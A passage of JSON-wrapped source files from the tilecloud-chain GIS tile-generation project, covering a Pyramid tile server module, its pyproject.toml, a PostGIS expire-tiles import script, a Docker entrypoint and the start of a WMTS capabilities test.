round(tile.tilecoord.y / meta_size * meta_size),\n meta_size,\n )\n if meta_size != 1\n else tile.tilecoord\n )\n if not layer_filter.filter_tilecoord(\n config, meta_tilecoord, params[\"LAYER\"], host=self.get_host(**kwargs)\n ):\n return self._map_cache(config, layer, tile, kwargs)\n\n store = self.get_store(config, params[\"LAYER\"])\n if store is None:\n return self.error(\n config,\n 400,\n f\"No store found for layer '{params['LAYER']}'\",\n **kwargs,\n )\n\n tile2 = store.get_one(tile)\n if tile2:\n if tile2.error:\n return self.error(config, 500, tile2.error, **kwargs)\n\n assert tile2.data\n assert tile2.content_type\n return self.response(\n config,\n tile2.data,\n headers={\n \"Content-Type\": tile2.content_type,\n \"Expires\": (\n datetime.datetime.utcnow()\n + datetime.timedelta(hours=self.get_expires_hours(config))\n ).isoformat(),\n \"Cache-Control\": f\"max-age={3600 * self.get_expires_hours(config)}\",\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Methods\": \"GET\",\n \"Tile-Backend\": \"Cache\",\n },\n **kwargs,\n )\n else:\n return self.error(config, 204, **kwargs)\n except HTTPException:\n raise\n except Exception:\n logger.exception(\"An unknown error occurred\")\n raise\n\n def _map_cache(\n self,\n config: tilecloud_chain.DatedConfig,\n layer: tilecloud_chain.configuration.Layer,\n tile: Tile,\n kwargs: Dict[str, Any],\n ) -> Response:\n \"\"\"Get the tile on a cache of tile.\"\"\"\n assert tilegeneration\n return internal_mapcache.fetch(config, self, tilegeneration, layer, tile, kwargs)\n\n def forward(\n self,\n config: tilecloud_chain.DatedConfig,\n url: str,\n headers: Optional[Any] = None,\n no_cache: bool = False,\n **kwargs: Any,\n ) -> Response:\n \"\"\"Forward the request on a fallback WMS server.\"\"\"\n if headers is None:\n headers = {}\n if no_cache:\n headers[\"Cache-Control\"] = \"no-cache\"\n headers[\"Pragma\"] = \"no-cache\"\n\n response = requests.get(url, headers=headers) # nosec\n if response.status_code == 200:\n response_headers = dict(response.headers)\n if no_cache:\n response_headers[\"Cache-Control\"] = \"no-cache, no-store\"\n response_headers[\"Pragma\"] = \"no-cache\"\n else:\n response_headers[\"Expires\"] = (\n datetime.datetime.utcnow() + datetime.timedelta(hours=self.get_expires_hours(config))\n ).isoformat()\n response_headers[\"Cache-Control\"] = f\"max-age={3600 * self.get_expires_hours(config)}\"\n response_headers[\"Access-Control-Allow-Origin\"] = \"*\"\n response_headers[\"Access-Control-Allow-Methods\"] = \"GET\"\n return self.response(config, response.content, headers=response_headers, **kwargs)\n else:\n message = (\n f\"The URL '{url}' return '{response.status_code} {response.reason}', \"\n f\"content:\\n{response.text}\"\n )\n logger.warning(message)\n return self.error(config, 502, message=message, **kwargs)\n\n def error(\n self,\n config: tilecloud_chain.DatedConfig,\n code: int,\n message: Optional[Union[Exception, str]] = \"\",\n **kwargs: Any,\n ) -> Response:\n \"\"\"Build the error, should be implemented in a sub class.\"\"\"\n\n raise NotImplementedError\n\n def response(\n self,\n config: tilecloud_chain.DatedConfig,\n data: bytes,\n headers: Optional[Dict[str, str]] = None,\n **kwargs: Any,\n ) -> Response:\n \"\"\"Build the response, should be implemented in a sub class.\"\"\"\n\n raise NotImplementedError\n\n def get_host(self, **kwargs: Any) -> str:\n \"\"\"Get the host used in Prometheus stats and in the JSON logs, should be implemented in a sub class.\"\"\"\n\n del kwargs\n return \"localhost\"\n\n\nif TYPE_CHECKING:\n WsgiServerBase = Server[List[bytes]]\nelse:\n WsgiServerBase = Server\n\n\nclass WsgiServer(WsgiServerBase):\n \"\"\"Convert the error and response for the WSGI server.\"\"\"\n\n HTTP_MESSAGES = {\n 204: \"204 No Content\",\n 400: \"400 Bad Request\",\n 403: \"403 Forbidden\",\n 404: \"404 Not Found\",\n 502: \"502 Bad Gateway\",\n }\n\n def error(\n self,\n config: tilecloud_chain.DatedConfig,\n code: int,\n message: Optional[Union[Exception, str]] = \"\",\n **kwargs: Any,\n ) -> List[bytes]:\n \"\"\"Build the error.\"\"\"\n assert message is not None\n kwargs[\"start_response\"](self.HTTP_MESSAGES[code], [])\n return [str(message).encode()]\n\n def response(\n self,\n config: tilecloud_chain.DatedConfig,\n data: bytes,\n headers: Optional[Dict[str, str]] = None,\n **kwargs: Any,\n ) -> List[bytes]:\n \"\"\"Build the response.\"\"\"\n if headers is None:\n headers = {}\n headers[\"Content-Length\"] = str(len(data))\n kwargs[\"start_response\"](\"200 OK\", headers.items())\n return [data]\n\n\ndef app_factory(\n global_config: Any,\n configfile: Optional[str] = os.environ.get(\"TILEGENERATION_CONFIGFILE\"),\n **local_conf: Any,\n) -> WsgiServer:\n \"\"\"Create the WSGI server.\"\"\"\n del global_config\n del local_conf\n\n init_tilegeneration(configfile)\n\n return WsgiServer()\n\n\nif TYPE_CHECKING:\n PyramidServerBase = Server[pyramid.response.Response]\nelse:\n PyramidServerBase = Server\n\n\nclass PyramidServer(PyramidServerBase):\n \"\"\"Convert the error and response for Pyramid.\"\"\"\n\n def error(\n self,\n config: tilecloud_chain.DatedConfig,\n code: int,\n message: Optional[Union[Exception, str]] = None,\n **kwargs: Any,\n ) -> pyramid.response.Response:\n \"\"\"Build the Pyramid response on error.\"\"\"\n headers = {\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Methods\": \"GET\",\n }\n if code < 300:\n headers.update(\n {\n \"Expires\": (\n datetime.datetime.utcnow() + datetime.timedelta(hours=self.get_expires_hours(config))\n ).isoformat(),\n \"Cache-Control\": f\"max-age={3600 * self.get_expires_hours(config)}\",\n }\n )\n return exception_response(code, detail=message, headers=headers)\n\n raise exception_response(code, detail=message, headers=headers)\n\n def response(\n self,\n config: tilecloud_chain.DatedConfig,\n data: bytes,\n headers: Optional[Dict[str, str]] = None,\n **kwargs: Any,\n ) -> pyramid.response.Response:\n \"\"\"Build the Pyramid response.\"\"\"\n if headers is None:\n headers = {}\n request: pyramid.request.Request = kwargs[\"request\"]\n request.response.headers = headers\n if isinstance(data, memoryview):\n request.response.body_file = data\n else:\n request.response.body = data\n return request.response\n\n def get_host(self, **kwargs: Any) -> str:\n request: pyramid.request.Request = kwargs[\"request\"]\n assert isinstance(request.host, str)\n return request.host\n\n\npyramid_server = None\n\n\nclass PyramidView:\n \"\"\"The Pyramid view.\"\"\"\n\n def __init__(self, request: Request) -> None:\n \"\"\"Init the Pyramid view.\"\"\"\n self.request = request\n\n global pyramid_server # pylint: disable=global-statement\n\n init_tilegeneration(request.registry.settings.get(\"tilegeneration_configfile\"))\n\n if pyramid_server is None:\n pyramid_server = PyramidServer()\n\n self.server = pyramid_server\n\n def __call__(self) -> pyramid.response.Response:\n \"\"\"Call the Pyramid view.\"\"\"\n params = {}\n path = None\n\n if \"path\" in self.request.matchdict:\n path = self.request.matchdict[\"path\"]\n\n for param, value in self.request.params.items():\n params[param.upper()] = value\n\n assert tilegeneration\n return self.server.serve(\n path,\n params,\n host=self.request.host,\n config=tilegeneration.get_host_config(self.request.host),\n request=self.request,\n )\n\n\ndef forbidden(request: pyramid.request.Request) -> pyramid.response.Response:\n \"\"\"Return a 403 Forbidden response.\"\"\"\n is_auth = c2cwsgiutils.auth.is_auth(request)\n\n if is_auth:\n return pyramid.httpexceptions.HTTPForbidden(request.exception.message)\n return pyramid.httpexceptions.HTTPFound(\n location=request.route_url(\n \"c2c_github_login\",\n _query={\"came_from\": request.current_route_url()},\n )\n )\n\n\ndef main(global_config: Any, **settings: Any) -> Router:\n \"\"\"Start the server in Pyramid.\"\"\"\n del global_config # unused\n\n config = Configurator(settings=settings)\n\n config.set_session_factory(\n pyramid.session.BaseCookieSessionFactory(json)\n if os.environ.get(\"TILECLOUD_CHAIN_DEBUG_SESSION\", \"false\").lower() == \"true\"\n else pyramid.session.SignedCookieSessionFactory(\n os.environ[\"TILECLOUD_CHAIN_SESSION_SECRET\"], salt=os.environ[\"TILECLOUD_CHAIN_SESSION_SALT\"]\n )\n )\n\n init_tilegeneration(settings.get(\"tilegeneration_configfile\"))\n assert tilegeneration\n\n config.include(c2cwsgiutils.pyramid.includeme)\n health_check.HealthCheck(config)\n add_mako_renderer(config, \".html\")\n config.set_security_policy(tilecloud_chain.security.SecurityPolicy())\n config.add_forbidden_view(forbidden)\n\n config.add_route(\n \"admin\",\n f\"/{tilegeneration.get_main_config().config['server']['admin_path']}\",\n request_method=\"GET\",\n )\n config.add_route(\n \"admin_slash\",\n f\"/{tilegeneration.get_main_config().config['server']['admin_path']}/\",\n request_method=\"GET\",\n )\n config.add_route(\n \"admin_run\",\n f\"/{tilegeneration.get_main_config().config['server']['admin_path']}/run\",\n request_method=\"POST\",\n )\n config.add_route(\n \"admin_test\",\n f\"/{tilegeneration.get_main_config().config['server']['admin_path']}/test\",\n request_method=\"GET\",\n )\n\n config.add_static_view(\n name=f\"/{tilegeneration.get_main_config().config['server']['admin_path']}/static\",\n path=\"/app/tilecloud_chain/static\",\n )\n\n config.add_route(\"tiles\", \"/*path\", request_method=\"GET\")\n config.add_view(PyramidView, route_name=\"tiles\")\n\n config.scan(\"tilecloud_chain.views\")\n\n return config.make_wsgi_app()\n" }, { "alpha_fraction": 0.6396505236625671, "alphanum_fraction": 0.6794214844703674, "avg_line_length": 30.913461685180664, "blob_id": "b1b558a8f1996438882bcbdb1da1ed1907ada6fd", "content_id": "b1ac116e44bdfc694e71bee7df78db944ee4fc69", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 3319, "license_type": "permissive", "max_line_length": 152, "num_lines": 104, "path": "/pyproject.toml", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "[tool.black]\nline-length = 110\ntarget-version = [\"py38\"]\n\n[tool.mypy]\npython_version = 3.8\nwarn_redundant_casts = true\nwarn_unused_ignores = true\nignore_missing_imports = true\nstrict = true\n\n[tool.isort]\nprofile = \"black\"\nline_length = 110\nknown_first_party = \"tilecloud\"\nknown_third_party = \"c2cwsgiutils\"\n\n[tool.poetry]\nname = \"tilecloud-chain\"\nversion = \"0.0.0\"\ndescription = \"Tools to generate tiles from WMS or Mapnik, to S3, Berkeley DB, MBTiles, or local filesystem in WMTS layout using Amazon cloud services.\"\nreadme = \"README.md\"\nauthors = [\"Camptocamp <[email protected]>\"]\nrepository = \"https://github.com/camptocamp/tilecloud-chain\"\nlicense = \"BSD-2-Clause\"\nkeywords = [\"gis\", \"tilecloud\", \"chain\"]\npackages = [{ include = \"tilecloud_chain\" }]\nclassifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Web Environment\",\n \"Framework :: Pyramid\",\n \"Intended Audience :: Other Audience\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.8\",\n \"Topic :: Scientific/Engineering :: GIS\",\n \"Typing :: Typed\",\n]\ninclude = [\"tilecloud_chain/py.typed\", \"tilecloud_chain/*.rst\", \"tilecloud_chain/*.md\"]\n\n[tool.poetry.scripts]\ngenerate-tiles = \"tilecloud_chain.generate:main\"\ngenerate-controller = \"tilecloud_chain.controller:main\"\ngenerate-cost = \"tilecloud_chain.cost:main\"\ngenerate-copy = \"tilecloud_chain.copy_:main\"\ngenerate-process = \"tilecloud_chain.copy_:process\"\nimport-expiretiles = \"tilecloud_chain.expiretiles:main\"\n\n[tool.poetry.plugins.\"pyramid.scaffold\"]\ntilecloud_chain = \"tilecloud_chain.scaffolds:Create\"\n\n[tool.poetry.plugins.\"paste.app_factory\"]\nmain = \"tilecloud_chain.server:main\"\n\n[tool.poetry.dependencies]\npython = \">=3.8,<3.11\"\nc2cwsgiutils = { version = \"6.0.0.dev142\", extras = [\"standard\", \"broadcast\", \"oauth2\"] }\npyramid-mako = \"1.1.0\"\npython-dateutil = \"2.8.2\"\ntilecloud = { version = \"1.10.0\", extras = [\"azure\", \"aws\", \"redis\", \"wsgi\"] }\nJinja2 = \"3.1.2\"\nPyYAML = \"6.0.1\"\nShapely = \"2.0.1\"\njsonschema = \"4.18.4\"\npyramid = \"2.0.1\"\njsonschema-validator-new = \"0.1.0\"\nazure-storage-blob = \"12.17.0\"\nwaitress = \"2.1.2\"\ncertifi = \"2023.7.22\"\n# Workaround to be able to do the lock file update\nurllib3 = \"1.26.16\"\n\n[tool.poetry.dev-dependencies]\nprospector = { extras = [\"with_mypy\", \"with_bandit\", \"with_pyroma\"], version = \"1.10.2\" }\nc2cwsgiutils = { version = \"6.0.0.dev142\", extras = [\"test_images\"] }\nscikit-image = { version = \"0.21.0\" }\npytest = \"7.4.0\"\ntestfixtures = \"7.1.0\"\ncoverage = \"7.2.7\"\ntypes-redis = \"4.6.0.3\"\ntypes-requests = \"2.31.0.2\"\n\n[build-system]\nrequires = [\"poetry-core>=1.0.0\", \"poetry-dynamic-versioning\", \"poetry-plugin-tweak-dependencies-version\"]\nbuild-backend = \"poetry.core.masonry.api\"\n\n[tool.poetry-dynamic-versioning]\nenable = true\nvcs = \"git\"\npattern = \"^(?P<base>\\\\d+(\\\\.\\\\d+)*)\"\nformat-jinja = \"\"\"\n{%- if env.get(\"VERSION_TYPE\") == \"version_branch\" -%}\n{{serialize_pep440(bump_version(base, 1 if env.get(\"IS_MASTER\") == \"TRUE\" else 2), dev=distance)}}\n{%- elif distance == 0 -%}\n{{serialize_pep440(base)}}\n{%- else -%}\n{{serialize_pep440(bump_version(base), dev=distance)}}\n{%- endif -%}\n\"\"\"\n\n[tool.poetry-plugin-tweak-dependencies-version]\ndefault = \"present\"\n" }, { "alpha_fraction": 0.45721665024757385, "alphanum_fraction": 0.4738456606864929, "avg_line_length": 32.481082916259766, "blob_id": "8c7b617d56784172fc98abe4e057436231e2c12d", "content_id": "a1037c6ac7320389d56bdf29d2d2a86f70a6d198", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6194, "license_type": "permissive", "max_line_length": 111, "num_lines": 185, "path": "/tilecloud_chain/expiretiles.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nimport sys\nfrom argparse import ArgumentParser\n\nimport psycopg2.sql\nfrom shapely.geometry import MultiPolygon, Polygon\nfrom shapely.ops import unary_union\n\nfrom tilecloud.grid.quad import QuadTileGrid\nfrom tilecloud_chain import parse_tilecoord\n\nlogger = logging.getLogger(__name__)\n\n\ndef main() -> None:\n \"\"\"Import the osm2pgsql expire-tiles file to Postgres.\"\"\"\n try:\n parser = ArgumentParser(\n description=\"Used to import the osm2pgsql expire-tiles file to Postgres\", prog=sys.argv[0]\n )\n parser.add_argument(\n \"--buffer\",\n type=float,\n default=0.0,\n help=\"Extent buffer to the tiles [m], default is 0\",\n )\n parser.add_argument(\n \"--simplify\",\n type=float,\n default=0.0,\n help=\"Simplify the result geometry [m], default is 0\",\n )\n parser.add_argument(\n \"--create\",\n default=False,\n action=\"store_true\",\n help=\"create the table if not exists\",\n )\n parser.add_argument(\n \"--delete\",\n default=False,\n action=\"store_true\",\n help=\"empty the table\",\n )\n parser.add_argument(\n \"file\",\n metavar=\"FILE\",\n help=\"The osm2pgsql expire-tiles file\",\n )\n parser.add_argument(\n \"connection\",\n metavar=\"CONNECTION\",\n help=(\n \"The PostgreSQL connection string e.g. \"\n '\"user=www-data password=www-data dbname=sig host=localhost\"'\n ),\n )\n parser.add_argument(\n \"table\",\n metavar=\"TABLE\",\n help=\"The PostgreSQL table to fill\",\n )\n parser.add_argument(\n \"--schema\",\n default=\"public\",\n help=\"The PostgreSQL schema to use (should already exists), default is public\",\n )\n parser.add_argument(\n \"column\",\n metavar=\"COLUMN\",\n default=\"geom\",\n nargs=\"?\",\n help='The PostgreSQL column, default is \"geom\"',\n )\n parser.add_argument(\n \"--srid\",\n type=int,\n default=3857,\n nargs=\"?\",\n help=\"The stored geometry SRID, no conversion by default (3857)\",\n )\n options = parser.parse_args()\n\n connection = psycopg2.connect(options.connection)\n cursor = connection.cursor()\n\n if options.create:\n cursor.execute(\n \"SELECT count(*) FROM pg_tables WHERE schemaname=%(schema)s AND tablename=%(table)s\",\n {\"schema\": options.schema, \"table\": options.table},\n )\n if cursor.fetchone()[0] == 0:\n cursor.execute(\n psycopg2.sql.SQL(\"CREATE TABLE IF NOT EXISTS {}.{} (id serial)\").format(\n psycopg2.sql.Identifier(options.schema), psycopg2.sql.Identifier(options.table)\n )\n )\n cursor.execute(\n \"SELECT AddGeometryColumn(%(schema)s, %(table)s, %(column)s, %(srid)s, 'MULTIPOLYGON', 2)\",\n {\n \"schema\": options.schema,\n \"table\": options.table,\n \"column\": options.column,\n \"srid\": options.srid,\n },\n )\n\n if options.delete:\n cursor.execute(psycopg2.sql.SQL(\"DELETE FROM {}\").format(psycopg2.sql.Identifier(options.table)))\n\n geoms = []\n grid = QuadTileGrid(\n max_extent=(-20037508.34, -20037508.34, 20037508.34, 20037508.34),\n )\n with open(options.file, encoding=\"utf-8\") as f:\n for coord in f:\n extent = grid.extent(parse_tilecoord(coord), options.buffer)\n geoms.append(\n Polygon(\n (\n (extent[0], extent[1]),\n (extent[0], extent[3]),\n (extent[2], extent[3]),\n (extent[2], extent[1]),\n )\n )\n )\n if len(geoms) == 0:\n print(\"No coords found\")\n connection.commit()\n cursor.close()\n connection.close()\n sys.exit(0)\n geom = unary_union(geoms)\n if geom.geom_type == \"Polygon\":\n geom = MultiPolygon((geom,))\n\n if options.simplify > 0:\n geom.simplify(options.simplify)\n\n if options.srid <= 0:\n cursor.execute(\n psycopg2.sql.SQL(\"INSERT INTO {} ({}) VALUES (ST_GeomFromText(%(geom)s))\").format(\n psycopg2.sql.Identifier(options.table),\n psycopg2.sql.Identifier(options.column),\n ),\n {\n \"geom\": geom.wkt,\n },\n )\n\n elif options.srid != 3857:\n cursor.execute(\n psycopg2.sql.SQL(\n \"INSERT INTO {} ({}) VALUES (ST_Transform(ST_GeomFromText(%(geom)s, 3857), %(srid)s))\"\n ).format(\n psycopg2.sql.Identifier(options.table),\n psycopg2.sql.Identifier(options.column),\n ),\n {\n \"geom\": geom.wkt,\n \"srid\": options.srid,\n },\n )\n else:\n cursor.execute(\n psycopg2.sql.SQL(\"INSERT INTO {} ({}) VALUES (ST_GeomFromText(%(geom)s, 3857))\").format(\n psycopg2.sql.Identifier(options.table),\n psycopg2.sql.Identifier(options.column),\n ),\n {\n \"geom\": geom.wkt,\n \"srid\": options.srid,\n },\n )\n\n connection.commit()\n cursor.close()\n connection.close()\n print(\"Import successful\")\n except SystemExit:\n raise\n except: # pylint: disable=bare-except\n logger.exception(\"Exit with exception\")\n sys.exit(1)\n" }, { "alpha_fraction": 0.6297444105148315, "alphanum_fraction": 0.6312935948371887, "avg_line_length": 28.340909957885742, "blob_id": "c81679c1e1676a95505dc5ce3a5277aabe39f590", "content_id": "6336ee63dd9166bd9a24d6bc2b7438fa5a905211", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1291, "license_type": "permissive", "max_line_length": 106, "num_lines": 44, "path": "/docker/run", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport os\nimport stat\nimport subprocess # nosec\nimport sys\n\nif \"GROUP_ID\" not in os.environ:\n sys.exit(\"The GROUP_ID environment variable is required\")\n\nif \"USER_ID\" not in os.environ:\n sys.exit(\"The USER_ID environment variable is required\")\n\nif \"USER_NAME\" not in os.environ:\n sys.exit(\"The USER_NAME environment variable is required\")\n\nif \"UMASK\" not in os.environ:\n sys.exit(\"The UMASK environment variable is required\")\n\nsubprocess.check_call([\"groupadd\", \"-g\", os.environ[\"GROUP_ID\"], \"geomapfish\"]) # nosec\nsubprocess.check_call( # nosec\n [\n \"useradd\",\n \"--shell\",\n \"/bin/bash\",\n \"--uid\",\n os.environ[\"USER_ID\"],\n \"--gid\",\n os.environ[\"GROUP_ID\"],\n os.environ[\"USER_NAME\"],\n ]\n)\n\nrun_file_name = \"/tmp/run\" # nosec\nwith open(run_file_name, \"w\") as run_file:\n run_file.write(\"#!/usr/bin/python\\n\")\n run_file.write(\"import subprocess, os\\n\")\n run_file.write(\"os.umask(0o{})\\n\".format(os.environ[\"UMASK\"]))\n run_file.write(f\"subprocess.check_call({repr(sys.argv[1:])})\\n\")\n\nos.chmod(\n run_file_name, stat.S_IRUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH\n)\nsubprocess.check_call([\"su\", os.environ[\"USER_NAME\"], \"-c\", run_file_name]) # nosec\n" }, { "alpha_fraction": 0.5537400245666504, "alphanum_fraction": 0.6074878573417664, "avg_line_length": 32.67156982421875, "blob_id": "7e2fa31cf5ffe4138d57ce7034470dc3d31293db", "content_id": "a1f41f0870e1a8e7dbf461f10520a3496d545fbe", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 64077, "license_type": "permissive", "max_line_length": 126, "num_lines": 1903, "path": "/tilecloud_chain/tests/test_controller.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\nimport shutil\n\nfrom tilecloud_chain import TileGeneration, controller\nfrom tilecloud_chain.tests import CompareCase\n\n\nclass TestController(CompareCase):\n def setUp(self) -> None: # noqa\n self.maxDiff = None\n\n @classmethod\n def setUpClass(cls): # noqa\n os.chdir(os.path.dirname(__file__))\n if os.path.exists(\"/tmp/tiles\"):\n shutil.rmtree(\"/tmp/tiles\")\n\n @classmethod\n def tearDownClass(cls): # noqa\n os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))\n if os.path.exists(\"/tmp/tiles\"):\n shutil.rmtree(\"/tmp/tiles\")\n\n def test_capabilities(self) -> None:\n gene = TileGeneration(\"tilegeneration/test-fix.yaml\", configure_logging=False)\n config = gene.get_config(\"tilegeneration/test-fix.yaml\")\n self.assert_result_equals(\n controller.get_wmts_capabilities(gene, config.config[\"generation\"][\"default_cache\"]),\n r\"\"\"<\\?xml version=\"1.0\" encoding=\"UTF-8\"\\?>\n<Capabilities version=\"1.0.0\"\n xmlns=\"http://www.opengis.net/wmts/1.0\"\n xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:gml=\"http://www.opengis.net/gml\"\n xsi:schemaLocation=\"http://schemas.opengis.net/wmts/1.0/wmtsGetCapabilities_response.xsd\">\n <ows:ServiceIdentification>\n <ows:Title>Some title</ows:Title>\n <ows:Abstract>Some abstract</ows:Abstract>\n <ows:Keywords>\n <ows:Keyword>some</ows:Keyword>\n <ows:Keyword>keywords</ows:Keyword>\n </ows:Keywords>\n <ows:ServiceType>OGC WMTS</ows:ServiceType>\n <ows:ServiceTypeVersion>1.0.0</ows:ServiceTypeVersion>\n <ows:Fees>None</ows:Fees>\n <ows:AccessConstraint>None</ows:AccessConstraint>\n </ows:ServiceIdentification>\n <ows:ServiceProvider>\n <ows:ProviderName>The provider name</ows:ProviderName>\n <ows:ProviderSite>The provider URL</ows:ProviderSite>\n <ows:ServiceContact>\n <ows:IndividualName>The contact name</ows:IndividualName>\n <ows:PositionName>The position name</ows:PositionName>\n <ows:ContactInfo>\n <ows:Phone>\n <ows:Voice>\\+41 11 222 33 44</ows:Voice>\n <ows:Facsimile>\\+41 11 222 33 44</ows:Facsimile>\n </ows:Phone>\n <ows:Address>\n <ows:DeliveryPoint>Address delivery</ows:DeliveryPoint>\n <ows:City>Berne</ows:City>\n <ows:AdministrativeArea>BE</ows:AdministrativeArea>\n <ows:PostalCode>3000</ows:PostalCode>\n <ows:Country>Switzerland</ows:Country>\n <ows:ElectronicMailAddress>[email protected]</ows:ElectronicMailAddress>\n </ows:Address>\n </ows:ContactInfo>\n </ows:ServiceContact>\n </ows:ServiceProvider>\n <ows:OperationsMetadata>\n <ows:Operation name=\"GetCapabilities\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/1.0.0/WMTSCapabilities.xml\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n <ows:Operation name=\"GetTile\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n </ows:OperationsMetadata>\n <!-- <ServiceMetadataURL xlink:href=\"\" /> -->\n <Contents>\n\n <Layer>\n <ows:Title>all</ows:Title>\n <ows:Identifier>all</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/all/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>line</ows:Title>\n <ows:Identifier>line</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/line/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik</ows:Title>\n <ows:Identifier>mapnik</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/mapnik/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik_grid</ows:Title>\n <ows:Identifier>mapnik_grid</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>application/utfgrid</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/mapnik_grid/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik_grid_drop</ows:Title>\n <ows:Identifier>mapnik_grid_drop</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>application/utfgrid</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/mapnik_grid_drop/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point</ows:Title>\n <ows:Identifier>point</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_hash</ows:Title>\n <ows:Identifier>point_hash</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n 